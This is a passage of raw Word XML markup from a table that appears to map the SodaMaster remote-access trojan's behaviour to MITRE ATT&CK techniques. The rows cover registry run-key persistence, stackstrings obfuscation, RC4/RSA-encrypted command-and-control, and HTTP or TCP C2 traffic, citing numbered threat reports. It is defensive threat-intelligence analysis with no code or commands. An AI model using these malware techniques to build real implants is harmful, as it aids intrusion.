            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DD6B75" w14:textId="7A0315F8" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E705BCC" w14:textId="77777777" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577E50FD" w14:textId="09D443FC" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23F5D660" w14:textId="1FC40AC2" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="001609E0" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="292DD9E6" w14:textId="551B3448" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Another characteristic of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the use of a common obfuscation technique known as “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>stackstrings</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>” to create the registry key in double-byte characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C6F56" w:rsidRPr="00A44889" w14:paraId="089FF678" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABA6B8A" w14:textId="03D41AE9" w:rsidR="009C6F56" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CBC5D9C" w14:textId="3ABC526E" w:rsidR="009C6F56" w:rsidRDefault="001609E0" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="015FE04C" w14:textId="4A52F41B" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="001609E0" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="562C870B" w14:textId="1CFFC50D" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05459D1F" w14:textId="77777777" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA97152" w14:textId="2F40C4BC" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316D466F" w14:textId="27E46921" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="001609E0" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4833DC87" w14:textId="6E7E9984" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Another characteristic of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the use of a common obfuscation technique known as “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>stackstrings</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>” to create the registry key in double-byte characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C31A81" w:rsidRPr="00A44889" w14:paraId="7A04A99D" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E894B7F" w14:textId="0D2194B4" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44220A59" w14:textId="5F16511D" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F3CF8C" w14:textId="5B712523" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C6E182E" w14:textId="229AB378" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56A2933F" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="005F0E0E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F7BF83" w14:textId="4A9E34DE" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C7AE671" w14:textId="2042F4D3" w:rsidR="005F0E0E" w:rsidRPr="00A44889" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048944EF" w14:textId="77777777" w:rsidR="005F0E0E" w:rsidRDefault="00A44889" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5] The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E785CC" w14:textId="1602172E" w:rsidR="00DA0649" w:rsidRPr="00A44889" w:rsidRDefault="00DA0649" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA0649">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>When execution of this malware begins, it creates a mutex with a name in the reverse order of the CRC32 checksum calculated from the encoded RSA key and its following additional data. Then the malware randomly generates a value as an RC4 key for C2 communicatio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009146A1" w:rsidRPr="00A44889" w14:paraId="41C4D11E" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25FCF207" w14:textId="60DAD0AA" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73DDADC3" w14:textId="77777777" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A600D06" w14:textId="3B2C7B34" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="00C436CD" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C436CD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r w:rsidR="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009146A1" w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E06A54" w14:textId="19D18367" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B90D8E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="495C1FD6" w14:textId="77777777" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3E3061" w14:textId="650CD3D4" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D2D8B2" w14:textId="77777777" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD00E63" w14:textId="14E8BF8A" w:rsidR="009146A1" w:rsidRPr="00A44889" w:rsidRDefault="009146A1" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Its communication can either happen via a raw TCP socket or a HTTP POST request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00954688" w:rsidRPr="00B857D7" w14:paraId="5243800E" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D61157F" w14:textId="55809216" w:rsidR="00954688" w:rsidRDefault="00954688" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="608264A1" w14:textId="1A463E60" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055B56DF" w14:textId="1DE757C1" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C206F72" w14:textId="352FD8F2" w:rsidR="00954688" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
